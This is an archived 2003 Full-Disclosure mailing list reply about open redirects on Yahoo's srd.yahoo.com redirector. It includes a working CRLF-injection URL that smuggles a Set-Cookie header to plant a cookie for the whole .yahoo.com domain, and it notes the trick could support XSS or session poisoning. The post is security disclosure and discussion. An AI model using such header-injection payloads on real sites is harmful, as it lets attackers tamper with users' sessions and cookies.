Re: [Full-Disclosure] CERT: Vulnerability in web redirectors
From: David Leadbeater (dgl@dgl.cx)
Date: 03/22/03
- Previous message: yossarian: "Re: [Full-Disclosure] Microsoft runs early April Fools ad"
- In reply to: Georgi Guninski: "Re: [Full-Disclosure] CERT: Vulnerability in web redirectors"
- Next in thread: http-equiv@excite.com: "Fw: [Full-Disclosure] CERT: Vulnerability in web redirectors"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: David Leadbeater <dgl@dgl.cx> To: Georgi Guninski <guninski@guninski.com> Date: Sat, 22 Mar 2003 21:19:16 +0000
Georgi Guninski wrote:
> Like this one?:
> --------------------
> http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
> --------------------
> (may be wrapped)
That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/
It adds a cookie for the whole .yahoo.com domain, this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: yossarian: "Re: [Full-Disclosure] Microsoft runs early April Fools ad"
- In reply to: Georgi Guninski: "Re: [Full-Disclosure] CERT: Vulnerability in web redirectors"
- Next in thread: http-equiv@excite.com: "Fw: [Full-Disclosure] CERT: Vulnerability in web redirectors"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
